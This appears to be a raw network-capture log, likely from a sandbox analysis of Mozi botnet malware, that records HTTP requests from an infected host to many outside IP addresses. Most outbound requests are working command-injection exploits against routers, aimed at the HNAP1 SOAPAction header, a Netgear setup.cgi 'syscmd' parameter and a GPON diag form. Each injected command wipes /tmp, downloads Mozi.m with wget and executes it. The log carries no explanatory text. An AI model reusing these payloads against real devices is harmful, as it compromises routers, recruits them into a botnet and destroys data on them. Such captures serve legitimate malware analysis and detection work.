                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or i


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        32192.168.2.2041018166.88.243.23780
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:01:59.213402987 CEST1026OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                        Host: 166.88.243.237:80
                                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                        Content-Length: 640
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                        Apr 25, 2021 21:01:59.414957047 CEST1027INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Sun, 25 Apr 2021 19:01:59 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 146
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        33192.168.2.203860051.83.246.14480
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:02:05.173824072 CEST1052OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 21:02:05.234440088 CEST1053INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Sun, 25 Apr 2021 19:02:05 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 146
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        34192.168.2.2043474166.88.120.2538080
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:02:09.281323910 CEST1078OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:8080
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
                                                                                                                        Apr 25, 2021 21:02:09.702130079 CEST1080INHTTP/1.0 400 Bad Request
                                                                                                                        Server: squid/3.1.23
                                                                                                                        Mime-Version: 1.0
                                                                                                                        Date: Sun, 25 Apr 2021 18:25:51 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 3179
                                                                                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0a 7d 0a 0a 2f 2a 20 47 65 6e 65 72 61 6c 20 74 65 78 74 20 2a 2f 0a 70 20 7b 0a 7d 0a 0a 2f 2a 20 65 72 72 6f 72 20 62 72 69 65 66 20 64 65 73 63 72 69
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;}/* General text */p {}/* error brief descri


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        35192.168.2.203517818.228.54.13980
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:02:16.245213032 CEST1116OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                        Host: 18.228.54.139:80
                                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                        Content-Length: 640
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        36192.168.2.204059295.8.122.638080
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:02:20.066616058 CEST1132OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        37192.168.2.2045922104.80.82.15280
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:02:23.276201010 CEST1148OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 21:02:23.535921097 CEST1149INHTTP/1.0 400 Bad Request
                                                                                                                        Server: AkamaiGHost
                                                                                                                        Mime-Version: 1.0
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 208
                                                                                                                        Expires: Sun, 25 Apr 2021 19:02:23 GMT
                                                                                                                        Date: Sun, 25 Apr 2021 19:02:23 GMT
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 63 63 34 37 61 38 61 26 23 34 36 3b 31 36 31 39 33 37 37 33 34 33 26 23 34 36 3b 39 63 63 31 64 32 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ccc47a8a&#46;1619377343&#46;9cc1d23</BODY></HTML>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        38192.168.2.2036852157.65.87.14180
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:02:30.497155905 CEST1182OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 21:02:30.775892019 CEST1182INHTTP/1.0 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 345
                                                                                                                        Connection: close
                                                                                                                        Date: Sun, 25 Apr 2021 19:02:30 GMT
                                                                                                                        Server: lighttpd/1.4.38
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        39192.168.2.204026023.40.37.3180
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:02:34.292520046 CEST1200OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                        Host: 23.40.37.31:80
                                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                        Content-Length: 640
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                        Apr 25, 2021 21:02:34.567008018 CEST1200INHTTP/1.0 400 Bad Request
                                                                                                                        Server: AkamaiGHost
                                                                                                                        Mime-Version: 1.0
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 250
                                                                                                                        Expires: Sun, 25 Apr 2021 19:02:34 GMT
                                                                                                                        Date: Sun, 25 Apr 2021 19:02:34 GMT
                                                                                                                        Connection: close
